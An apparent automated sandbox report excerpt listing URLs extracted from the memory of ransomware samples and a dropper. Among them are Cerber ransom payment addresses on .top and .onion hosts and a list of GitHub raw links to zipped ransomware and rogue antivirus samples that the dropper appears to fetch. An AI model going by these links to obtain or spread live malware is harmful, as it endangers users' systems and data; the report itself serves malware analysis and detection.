        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: Endermanch@DeriaLock.exe, 00000013.00000000.310704475.0000000000312000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://wallup.net
        Source: Endermanch@DeriaLock.exe, 00000013.00000000.310704475.0000000000312000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://wallup.nethttp://wallup.nethttp://wallup.net
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com///whatismyipaddress.com/ip/Click
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://whatsmyip.net/
        Source: Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://www.advancedinstaller.com0
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.333079458.0000000005670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: svchost.exe, 00000005.00000002.310298217.000001E5E5A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.327064556.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327123356.0000000005685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.327506990.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328383198.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327371501.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328611212.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327774074.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328911134.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329491498.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327882558.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328232925.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327717423.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329149705.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327256329.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328778379.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327324383.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328474289.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329108864.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328029816.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327555439.0000000005685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com=wf
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.327159529.000000000566B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comc
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.327064556.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327123356.0000000005685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comew
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.327084068.000000000566B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comn
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.327506990.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328383198.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327371501.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328611212.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327774074.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328911134.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329491498.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327882558.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328232925.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327717423.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329149705.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327256329.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328778379.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327324383.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328474289.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329108864.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328029816.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327555439.0000000005685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comx
        Source: LOAcQQUU.exe, 0000003C.00000003.407997565.0000000004760000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.341610659.0000000005653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-esz
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-hu
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/h
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/s
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.341610659.0000000005653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.341610659.0000000005653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
        Source: Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/z
        Source: fatalerror.exe.57.drString found in binary or memory: http://www.microsoft.aios.us#=
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.526568195.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.526568195.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html.
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.17gcun.top/7E0A-369D-D0F0-0098-B26C
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.18ey8e.top/7E0A-369D-D0F0-0098-B26C
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.19kdeh.top/7E0A-369D-D0F0-0098-B26C
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1mpsnr.top/7E0A-369D-D0F0-0098-B26C
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1n5mod.top/7E0A-369D-D0F0-0098-B26C
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C
        Source: svchost.exe, 00000003.00000002.554820833.0000026EC783E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
        Source: svchost.exe, 00000003.00000002.554820833.0000026EC783E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
        Source: svchost.exe, 00000003.00000002.554820833.0000026EC783E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
        Source: svchost.exe, 00000003.00000002.554820833.0000026EC783E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
        Source: svchost.exe, 00000003.00000002.554820833.0000026EC783E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa06
        Source: svchost.exe, 00000005.00000003.309277515.000001E5E5A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
        Source: svchost.exe, 00000005.00000002.310651024.000001E5E5A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
        Source: svchost.exe, 00000005.00000003.309107047.000001E5E5A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.310693087.000001E5E5A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
        Source: svchost.exe, 00000005.00000002.310651024.000001E5E5A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
        Source: svchost.exe, 00000005.00000003.309790326.000001E5E5A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.310667792.000001E5E5A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.309472318.000001E5E5A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
        Source: svchost.exe, 00000005.00000003.309790326.000001E5E5A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.310667792.000001E5E5A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.309472318.000001E5E5A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
        Source: svchost.exe, 00000005.00000002.310722812.000001E5E5A5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.309277515.000001E5E5A5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.309472318.000001E5E5A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
        Source: svchost.exe, 00000005.00000003.309277515.000001E5E5A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000005.00000003.309277515.000001E5E5A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000005.00000002.310722812.000001E5E5A5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.309277515.000001E5E5A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000005.00000002.310746113.000001E5E5A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
        Source: svchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
        Source: svchost.exe, 00000005.00000002.310651024.000001E5E5A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000005.00000003.287334816.000001E5E5A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zipOhttps://github.co
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zipU
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zipS
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/AnVi
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zipZ
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwC
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.647628975.0000026280733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Happy
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zipJhttps
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip
